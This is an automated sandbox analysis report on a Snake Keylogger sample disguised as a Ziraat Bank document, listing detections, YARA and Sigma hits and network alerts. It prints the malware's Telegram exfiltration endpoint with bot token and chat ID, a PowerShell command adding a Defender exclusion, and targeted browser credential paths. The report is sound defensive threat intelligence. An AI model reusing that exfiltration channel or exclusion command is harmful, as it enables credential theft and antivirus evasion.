Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe

Overview

General Information

Sample name:ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
renamed because original name is a hash value
Original sample name:ziraat bankasi_TRY Mteri No_11055699-1034 nolu TICARI 26.09.2024.exe
Analysis ID:1519312
MD5:b1ef1a6ce1c1851c95cb5625bc06e69d
SHA1:feec17f1cea1f7e586a22b7970c3f8caa078a72f
SHA256:597e62b3b65a0231ecd15b165241f46858d133ff7cea5762b9d90819e5a470ff
Tags:exeuser-lowmal3
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Moves itself to temp directory
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc", "Chat_id": "-4209622687", "Version": "5.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.4154364843.0000000003215000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000003.00000002.4152159317.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000003.00000002.4152159317.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0x14476:$a1: get_encryptedPassword
      • 0x1475a:$a2: get_encryptedUsername
      • 0x14272:$a3: get_timePasswordChanged
      • 0x1436d:$a4: get_passwordField
      • 0x1448c:$a5: set_encryptedPassword
      • 0x15b1b:$a7: get_logins
      • 0x15a7e:$a10: KeyLoggerEventArgs
      • 0x156e9:$a11: KeyLoggerEventArgsEventHandler
      00000003.00000002.4152159317.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
      • 0x19434:$x1: $%SMTPDV$
      • 0x17df8:$x2: $#TheHashHere%&
      • 0x193dc:$x3: %FTPDV$
      • 0x17d98:$x4: $%TelegramDv$
      • 0x156e9:$x5: KeyLoggerEventArgs
      • 0x15a7e:$x5: KeyLoggerEventArgs
      • 0x19400:$m2: Clipboard Logs ID
      • 0x1963e:$m2: Screenshot Logs ID
      • 0x1974e:$m2: keystroke Logs ID
      • 0x19a28:$m3: SnakePW
      • 0x19616:$m4: \SnakeKeylogger\
      00000003.00000002.4154364843.0000000003161000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x12876:$a1: get_encryptedPassword
          • 0x12b5a:$a2: get_encryptedUsername
          • 0x12672:$a3: get_timePasswordChanged
          • 0x1276d:$a4: get_passwordField
          • 0x1288c:$a5: set_encryptedPassword
          • 0x13f1b:$a7: get_logins
          • 0x13e7e:$a10: KeyLoggerEventArgs
          • 0x13ae9:$a11: KeyLoggerEventArgsEventHandler
          0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
          • 0x1a214:$a2: \Comodo\Dragon\User Data\Default\Login Data
          • 0x19446:$a3: \Google\Chrome\User Data\Default\Login Data
          • 0x19879:$a4: \Orbitum\User Data\Default\Login Data
          • 0x1a8b8:$a5: \Kometa\User Data\Default\Login Data
          0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
          • 0x13449:$s1: UnHook
          • 0x13450:$s2: SetHook
          • 0x13458:$s3: CallNextHook
          • 0x13465:$s4: _hook
          0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.unpackMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
          • 0x17834:$x1: $%SMTPDV$
          • 0x161f8:$x2: $#TheHashHere%&
          • 0x177dc:$x3: %FTPDV$
          • 0x16198:$x4: $%TelegramDv$
          • 0x13ae9:$x5: KeyLoggerEventArgs
          • 0x13e7e:$x5: KeyLoggerEventArgs
          • 0x17800:$m2: Clipboard Logs ID
          • 0x17a3e:$m2: Screenshot Logs ID
          • 0x17b4e:$m2: keystroke Logs ID
          • 0x17e28:$m3: SnakePW
          • 0x17a16:$m4: \SnakeKeylogger\
          Click to see the 21 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe", ParentImage: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, ParentProcessId: 6640, ParentProcessName: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe", ProcessId: 4124, ProcessName: powershell.exe
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe", ParentImage: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, ParentProcessId: 6640, ParentProcessName: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe", ProcessId: 4124, ProcessName: powershell.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe", ParentImage: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, ParentProcessId: 6640, ParentProcessName: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe", ProcessId: 4124, ProcessName: powershell.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-26T10:59:10.980972+020028033053Unknown Traffic192.168.2.449737188.114.96.3443TCP
          2024-09-26T10:59:15.394378+020028033053Unknown Traffic192.168.2.449743188.114.96.3443TCP
          2024-09-26T10:59:16.695132+020028033053Unknown Traffic192.168.2.449745188.114.96.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-26T10:59:08.503535+020028032742Potentially Bad Traffic192.168.2.449733193.122.6.16880TCP
          2024-09-26T10:59:10.425477+020028032742Potentially Bad Traffic192.168.2.449733193.122.6.16880TCP
          2024-09-26T10:59:11.691080+020028032742Potentially Bad Traffic192.168.2.449738193.122.6.16880TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-26T10:59:25.370265+020028530061A Network Trojan was detected192.168.2.449756149.154.167.220443TCP
          2024-09-26T10:59:35.513022+020028530061A Network Trojan was detected192.168.2.449757149.154.167.220443TCP
          2024-09-26T10:59:36.500717+020028530061A Network Trojan was detected192.168.2.449758149.154.167.220443TCP
          2024-09-26T10:59:37.436053+020028530061A Network Trojan was detected192.168.2.449759149.154.167.220443TCP
          2024-09-26T10:59:38.342591+020028530061A Network Trojan was detected192.168.2.449760149.154.167.220443TCP
          2024-09-26T10:59:39.310111+020028530061A Network Trojan was detected192.168.2.449761149.154.167.220443TCP
          2024-09-26T10:59:43.238124+020028530061A Network Trojan was detected192.168.2.449762149.154.167.220443TCP
          2024-09-26T10:59:44.270641+020028530061A Network Trojan was detected192.168.2.449763149.154.167.220443TCP
          2024-09-26T10:59:45.246722+020028530061A Network Trojan was detected192.168.2.449764149.154.167.220443TCP
          2024-09-26T10:59:46.170442+020028530061A Network Trojan was detected192.168.2.449765149.154.167.220443TCP
          2024-09-26T10:59:47.088270+020028530061A Network Trojan was detected192.168.2.449766149.154.167.220443TCP
          2024-09-26T10:59:51.029398+020028530061A Network Trojan was detected192.168.2.449767149.154.167.220443TCP
          2024-09-26T10:59:51.976834+020028530061A Network Trojan was detected192.168.2.449768149.154.167.220443TCP
          2024-09-26T10:59:52.918953+020028530061A Network Trojan was detected192.168.2.449769149.154.167.220443TCP
          2024-09-26T10:59:53.828892+020028530061A Network Trojan was detected192.168.2.449770149.154.167.220443TCP
          2024-09-26T10:59:54.730651+020028530061A Network Trojan was detected192.168.2.449771149.154.167.220443TCP
          2024-09-26T10:59:58.648936+020028530061A Network Trojan was detected192.168.2.449772149.154.167.220443TCP
          2024-09-26T10:59:59.574413+020028530061A Network Trojan was detected192.168.2.449774149.154.167.220443TCP
          2024-09-26T11:00:00.559091+020028530061A Network Trojan was detected192.168.2.449775149.154.167.220443TCP
          2024-09-26T11:00:01.614664+020028530061A Network Trojan was detected192.168.2.449776149.154.167.220443TCP
          2024-09-26T11:00:02.510408+020028530061A Network Trojan was detected192.168.2.449777149.154.167.220443TCP
          2024-09-26T11:00:03.459104+020028530061A Network Trojan was detected192.168.2.449778149.154.167.220443TCP
          2024-09-26T11:00:04.381999+020028530061A Network Trojan was detected192.168.2.449779149.154.167.220443TCP
          2024-09-26T11:00:05.432464+020028530061A Network Trojan was detected192.168.2.449780149.154.167.220443TCP
          2024-09-26T11:00:06.583485+020028530061A Network Trojan was detected192.168.2.449781149.154.167.220443TCP
          2024-09-26T11:00:07.533281+020028530061A Network Trojan was detected192.168.2.449782149.154.167.220443TCP
          2024-09-26T11:00:08.559168+020028530061A Network Trojan was detected192.168.2.449783149.154.167.220443TCP
          2024-09-26T11:00:10.378152+020028530061A Network Trojan was detected192.168.2.449784149.154.167.220443TCP
          2024-09-26T11:00:11.359345+020028530061A Network Trojan was detected192.168.2.449785149.154.167.220443TCP
          2024-09-26T11:00:12.297322+020028530061A Network Trojan was detected192.168.2.449786149.154.167.220443TCP
          2024-09-26T11:00:13.303418+020028530061A Network Trojan was detected192.168.2.449787149.154.167.220443TCP
          2024-09-26T11:00:14.204559+020028530061A Network Trojan was detected192.168.2.449788149.154.167.220443TCP
          2024-09-26T11:00:15.476208+020028530061A Network Trojan was detected192.168.2.449789149.154.167.220443TCP
          2024-09-26T11:00:25.125794+020028530061A Network Trojan was detected192.168.2.449790149.154.167.220443TCP
          2024-09-26T11:00:26.047019+020028530061A Network Trojan was detected192.168.2.449791149.154.167.220443TCP
          2024-09-26T11:00:26.962687+020028530061A Network Trojan was detected192.168.2.449792149.154.167.220443TCP
          2024-09-26T11:00:28.652152+020028530061A Network Trojan was detected192.168.2.449793149.154.167.220443TCP
          2024-09-26T11:00:29.861520+020028530061A Network Trojan was detected192.168.2.449794149.154.167.220443TCP
          2024-09-26T11:00:30.783422+020028530061A Network Trojan was detected192.168.2.449795149.154.167.220443TCP
          2024-09-26T11:00:31.689037+020028530061A Network Trojan was detected192.168.2.449796149.154.167.220443TCP
          2024-09-26T11:00:32.621264+020028530061A Network Trojan was detected192.168.2.449797149.154.167.220443TCP
          2024-09-26T11:00:33.518772+020028530061A Network Trojan was detected192.168.2.449798149.154.167.220443TCP
          2024-09-26T11:00:37.423906+020028530061A Network Trojan was detected192.168.2.449799149.154.167.220443TCP
          2024-09-26T11:00:38.901327+020028530061A Network Trojan was detected192.168.2.449800149.154.167.220443TCP
          2024-09-26T11:00:39.837306+020028530061A Network Trojan was detected192.168.2.449801149.154.167.220443TCP
          2024-09-26T11:00:40.814344+020028530061A Network Trojan was detected192.168.2.449802149.154.167.220443TCP
          2024-09-26T11:00:41.764836+020028530061A Network Trojan was detected192.168.2.449803149.154.167.220443TCP
          2024-09-26T11:00:43.381471+020028530061A Network Trojan was detected192.168.2.449804149.154.167.220443TCP
          2024-09-26T11:00:45.155505+020028530061A Network Trojan was detected192.168.2.449805149.154.167.220443TCP
          2024-09-26T11:00:46.094598+020028530061A Network Trojan was detected192.168.2.449806149.154.167.220443TCP
          2024-09-26T11:00:47.132841+020028530061A Network Trojan was detected192.168.2.449807149.154.167.220443TCP
          2024-09-26T11:00:48.114079+020028530061A Network Trojan was detected192.168.2.449808149.154.167.220443TCP
          2024-09-26T11:00:49.293533+020028530061A Network Trojan was detected192.168.2.449809149.154.167.220443TCP
          2024-09-26T11:00:50.264080+020028530061A Network Trojan was detected192.168.2.449810149.154.167.220443TCP
          2024-09-26T11:00:51.337054+020028530061A Network Trojan was detected192.168.2.449811149.154.167.220443TCP
          2024-09-26T11:00:52.295641+020028530061A Network Trojan was detected192.168.2.449812149.154.167.220443TCP
          2024-09-26T11:00:53.787937+020028530061A Network Trojan was detected192.168.2.449813149.154.167.220443TCP
          2024-09-26T11:00:54.815737+020028530061A Network Trojan was detected192.168.2.449814149.154.167.220443TCP
          2024-09-26T11:00:55.730336+020028530061A Network Trojan was detected192.168.2.449815149.154.167.220443TCP
          2024-09-26T11:00:56.654927+020028530061A Network Trojan was detected192.168.2.449816149.154.167.220443TCP
          2024-09-26T11:00:57.613721+020028530061A Network Trojan was detected192.168.2.449817149.154.167.220443TCP
          2024-09-26T11:00:58.570975+020028530061A Network Trojan was detected192.168.2.449818149.154.167.220443TCP
          2024-09-26T11:00:59.549474+020028530061A Network Trojan was detected192.168.2.449819149.154.167.220443TCP
          2024-09-26T11:01:00.566994+020028530061A Network Trojan was detected192.168.2.449820149.154.167.220443TCP
          2024-09-26T11:01:01.468993+020028530061A Network Trojan was detected192.168.2.449821149.154.167.220443TCP
          2024-09-26T11:01:02.694692+020028530061A Network Trojan was detected192.168.2.449822149.154.167.220443TCP
          2024-09-26T11:01:04.651076+020028530061A Network Trojan was detected192.168.2.449823149.154.167.220443TCP
          2024-09-26T11:01:05.896560+020028530061A Network Trojan was detected192.168.2.449824149.154.167.220443TCP
          2024-09-26T11:01:06.797225+020028530061A Network Trojan was detected192.168.2.449825149.154.167.220443TCP
          2024-09-26T11:01:07.705404+020028530061A Network Trojan was detected192.168.2.449826149.154.167.220443TCP
          2024-09-26T11:01:08.640317+020028530061A Network Trojan was detected192.168.2.449827149.154.167.220443TCP
          2024-09-26T11:01:09.541051+020028530061A Network Trojan was detected192.168.2.449828149.154.167.220443TCP
          2024-09-26T11:01:10.459831+020028530061A Network Trojan was detected192.168.2.449829149.154.167.220443TCP
          2024-09-26T11:01:11.368468+020028530061A Network Trojan was detected192.168.2.449830149.154.167.220443TCP
          2024-09-26T11:01:12.287635+020028530061A Network Trojan was detected192.168.2.449831149.154.167.220443TCP
          2024-09-26T11:01:13.196540+020028530061A Network Trojan was detected192.168.2.449832149.154.167.220443TCP
          2024-09-26T11:01:14.114327+020028530061A Network Trojan was detected192.168.2.449833149.154.167.220443TCP
          2024-09-26T11:01:15.016882+020028530061A Network Trojan was detected192.168.2.449834149.154.167.220443TCP
          2024-09-26T11:01:15.932889+020028530061A Network Trojan was detected192.168.2.449835149.154.167.220443TCP
          2024-09-26T11:01:24.909478+020028530061A Network Trojan was detected192.168.2.449836149.154.167.220443TCP
          2024-09-26T11:01:25.842970+020028530061A Network Trojan was detected192.168.2.449837149.154.167.220443TCP
          2024-09-26T11:01:26.766599+020028530061A Network Trojan was detected192.168.2.449838149.154.167.220443TCP
          2024-09-26T11:01:27.674843+020028530061A Network Trojan was detected192.168.2.449839149.154.167.220443TCP
          2024-09-26T11:01:28.998332+020028530061A Network Trojan was detected192.168.2.449840149.154.167.220443TCP
          2024-09-26T11:01:29.938523+020028530061A Network Trojan was detected192.168.2.449841149.154.167.220443TCP
          2024-09-26T11:01:30.885673+020028530061A Network Trojan was detected192.168.2.449842149.154.167.220443TCP
          2024-09-26T11:01:32.219178+020028530061A Network Trojan was detected192.168.2.449843149.154.167.220443TCP
          2024-09-26T11:01:33.156071+020028530061A Network Trojan was detected192.168.2.449844149.154.167.220443TCP
          2024-09-26T11:01:34.164354+020028530061A Network Trojan was detected192.168.2.449845149.154.167.220443TCP
          2024-09-26T11:01:35.318573+020028530061A Network Trojan was detected192.168.2.449846149.154.167.220443TCP
          2024-09-26T11:01:36.241710+020028530061A Network Trojan was detected192.168.2.449847149.154.167.220443TCP
          2024-09-26T11:01:37.230002+020028530061A Network Trojan was detected192.168.2.449848149.154.167.220443TCP
          2024-09-26T11:01:38.317560+020028530061A Network Trojan was detected192.168.2.449849149.154.167.220443TCP
          2024-09-26T11:01:40.135771+020028530061A Network Trojan was detected192.168.2.449850149.154.167.220443TCP
          2024-09-26T11:01:41.308732+020028530061A Network Trojan was detected192.168.2.449851149.154.167.220443TCP
          2024-09-26T11:01:42.406685+020028530061A Network Trojan was detected192.168.2.449852149.154.167.220443TCP
          2024-09-26T11:01:43.400114+020028530061A Network Trojan was detected192.168.2.449853149.154.167.220443TCP
          2024-09-26T11:01:44.719292+020028530061A Network Trojan was detected192.168.2.449854149.154.167.220443TCP
          2024-09-26T11:01:45.772223+020028530061A Network Trojan was detected192.168.2.449855149.154.167.220443TCP
          2024-09-26T11:01:46.746165+020028530061A Network Trojan was detected192.168.2.449856149.154.167.220443TCP
          2024-09-26T11:01:47.742253+020028530061A Network Trojan was detected192.168.2.449857149.154.167.220443TCP
          2024-09-26T11:01:48.654016+020028530061A Network Trojan was detected192.168.2.449858149.154.167.220443TCP
          2024-09-26T11:01:50.581715+020028530061A Network Trojan was detected192.168.2.449859149.154.167.220443TCP
          2024-09-26T11:01:51.608499+020028530061A Network Trojan was detected192.168.2.449860149.154.167.220443TCP
          2024-09-26T11:01:52.517072+020028530061A Network Trojan was detected192.168.2.449861149.154.167.220443TCP
          2024-09-26T11:01:53.447963+020028530061A Network Trojan was detected192.168.2.449862149.154.167.220443TCP
          2024-09-26T11:01:54.350230+020028530061A Network Trojan was detected192.168.2.449863149.154.167.220443TCP
          2024-09-26T11:01:55.228373+020028530061A Network Trojan was detected192.168.2.449864149.154.167.220443TCP
          2024-09-26T11:01:56.166560+020028530061A Network Trojan was detected192.168.2.449865149.154.167.220443TCP
          2024-09-26T11:01:57.329028+020028530061A Network Trojan was detected192.168.2.449866149.154.167.220443TCP
          2024-09-26T11:01:58.273561+020028530061A Network Trojan was detected192.168.2.449867149.154.167.220443TCP
          2024-09-26T11:01:59.199831+020028530061A Network Trojan was detected192.168.2.449868149.154.167.220443TCP
          2024-09-26T11:02:00.152322+020028530061A Network Trojan was detected192.168.2.449869149.154.167.220443TCP
          2024-09-26T11:02:01.055371+020028530061A Network Trojan was detected192.168.2.449870149.154.167.220443TCP
          2024-09-26T11:02:01.951206+020028530061A Network Trojan was detected192.168.2.449871149.154.167.220443TCP
          2024-09-26T11:02:02.829604+020028530061A Network Trojan was detected192.168.2.449872149.154.167.220443TCP
          2024-09-26T11:02:03.828956+020028530061A Network Trojan was detected192.168.2.449873149.154.167.220443TCP
          2024-09-26T11:02:04.932842+020028530061A Network Trojan was detected192.168.2.449874149.154.167.220443TCP
          2024-09-26T11:02:05.959710+020028530061A Network Trojan was detected192.168.2.449875149.154.167.220443TCP
          2024-09-26T11:02:06.917530+020028530061A Network Trojan was detected192.168.2.449876149.154.167.220443TCP
          2024-09-26T11:02:07.794842+020028530061A Network Trojan was detected192.168.2.449877149.154.167.220443TCP
          2024-09-26T11:02:08.824328+020028530061A Network Trojan was detected192.168.2.449878149.154.167.220443TCP
          2024-09-26T11:02:09.942677+020028530061A Network Trojan was detected192.168.2.449879149.154.167.220443TCP
          2024-09-26T11:02:10.926451+020028530061A Network Trojan was detected192.168.2.449880149.154.167.220443TCP
          2024-09-26T11:02:11.805289+020028530061A Network Trojan was detected192.168.2.449881149.154.167.220443TCP
          2024-09-26T11:02:12.746607+020028530061A Network Trojan was detected192.168.2.449882149.154.167.220443TCP
          2024-09-26T11:02:13.657135+020028530061A Network Trojan was detected192.168.2.449883149.154.167.220443TCP
          2024-09-26T11:02:14.746589+020028530061A Network Trojan was detected192.168.2.449884149.154.167.220443TCP
          2024-09-26T11:02:15.682786+020028530061A Network Trojan was detected192.168.2.449885149.154.167.220443TCP
          2024-09-26T11:02:24.697414+020028530061A Network Trojan was detected192.168.2.449886149.154.167.220443TCP
          2024-09-26T11:02:28.690087+020028530061A Network Trojan was detected192.168.2.449887149.154.167.220443TCP
          2024-09-26T11:02:29.843864+020028530061A Network Trojan was detected192.168.2.449888149.154.167.220443TCP
          2024-09-26T11:02:30.802683+020028530061A Network Trojan was detected192.168.2.449889149.154.167.220443TCP
          2024-09-26T11:02:31.746613+020028530061A Network Trojan was detected192.168.2.449890149.154.167.220443TCP
          2024-09-26T11:02:32.700215+020028530061A Network Trojan was detected192.168.2.449891149.154.167.220443TCP
          2024-09-26T11:02:33.616265+020028530061A Network Trojan was detected192.168.2.449892149.154.167.220443TCP
          2024-09-26T11:02:37.575968+020028530061A Network Trojan was detected192.168.2.449893149.154.167.220443TCP
          2024-09-26T11:02:38.511567+020028530061A Network Trojan was detected192.168.2.449894149.154.167.220443TCP
          2024-09-26T11:02:39.432699+020028530061A Network Trojan was detected192.168.2.449895149.154.167.220443TCP
          2024-09-26T11:02:40.367326+020028530061A Network Trojan was detected192.168.2.449896149.154.167.220443TCP
          2024-09-26T11:02:41.391783+020028530061A Network Trojan was detected192.168.2.449897149.154.167.220443TCP
          2024-09-26T11:02:45.414509+020028530061A Network Trojan was detected192.168.2.449898149.154.167.220443TCP
          2024-09-26T11:02:46.456880+020028530061A Network Trojan was detected192.168.2.449899149.154.167.220443TCP
          2024-09-26T11:02:47.424948+020028530061A Network Trojan was detected192.168.2.449900149.154.167.220443TCP
          2024-09-26T11:02:48.358700+020028530061A Network Trojan was detected192.168.2.449901149.154.167.220443TCP
          2024-09-26T11:02:49.569534+020028530061A Network Trojan was detected192.168.2.449902149.154.167.220443TCP
          2024-09-26T11:02:50.566009+020028530061A Network Trojan was detected192.168.2.449903149.154.167.220443TCP
          2024-09-26T11:02:51.506020+020028530061A Network Trojan was detected192.168.2.449904149.154.167.220443TCP
          2024-09-26T11:02:52.574256+020028530061A Network Trojan was detected192.168.2.449905149.154.167.220443TCP
          2024-09-26T11:02:53.543905+020028530061A Network Trojan was detected192.168.2.449906149.154.167.220443TCP
          2024-09-26T11:02:54.460326+020028530061A Network Trojan was detected192.168.2.449907149.154.167.220443TCP
          2024-09-26T11:02:55.359781+020028530061A Network Trojan was detected192.168.2.449908149.154.167.220443TCP
          2024-09-26T11:02:57.045205+020028530061A Network Trojan was detected192.168.2.449909149.154.167.220443TCP
          2024-09-26T11:02:57.939710+020028530061A Network Trojan was detected192.168.2.449910149.154.167.220443TCP
          2024-09-26T11:02:58.851194+020028530061A Network Trojan was detected192.168.2.449911149.154.167.220443TCP
          2024-09-26T11:02:59.812610+020028530061A Network Trojan was detected192.168.2.449912149.154.167.220443TCP
          2024-09-26T11:03:00.867641+020028530061A Network Trojan was detected192.168.2.449913149.154.167.220443TCP
          2024-09-26T11:03:01.825600+020028530061A Network Trojan was detected192.168.2.449914149.154.167.220443TCP
          2024-09-26T11:03:03.046369+020028530061A Network Trojan was detected192.168.2.449915149.154.167.220443TCP
          2024-09-26T11:03:03.962991+020028530061A Network Trojan was detected192.168.2.449916149.154.167.220443TCP
          2024-09-26T11:03:04.918003+020028530061A Network Trojan was detected192.168.2.449917149.154.167.220443TCP
          2024-09-26T11:03:05.858583+020028530061A Network Trojan was detected192.168.2.449918149.154.167.220443TCP
          2024-09-26T11:03:06.970959+020028530061A Network Trojan was detected192.168.2.449919149.154.167.220443TCP
